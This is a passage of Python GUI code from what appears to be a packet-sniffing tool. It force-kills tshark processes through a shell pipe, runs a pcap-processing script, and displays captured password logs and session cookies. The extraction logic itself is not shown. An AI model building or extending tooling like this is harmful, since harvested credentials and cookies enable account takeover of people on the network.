        system("ps -ef|awk \'$8~/tshark/{print \"kill -9 \"$2}\' |sh")

    def OnGenButton2Button(self, event):

	#Processing the log and cookie and show in the richTextCtrl1
        info_process_command="python /var/sec/pcap_process.py"
        self.info_process=WorkerThread(self,info_process_command,1)
        pass_info=open('/var/sec/pcap_log','r')
        self.richTextCtrl1.Value=pass_info.read()
        cookie_info=open('/var/sec/pcap_cookie','r')
        self.richTextCtrl4.Value=cookie_info.read()
	#End Processing

    def OnCheckBox16Checkbox(self, event):
        event.Skip()
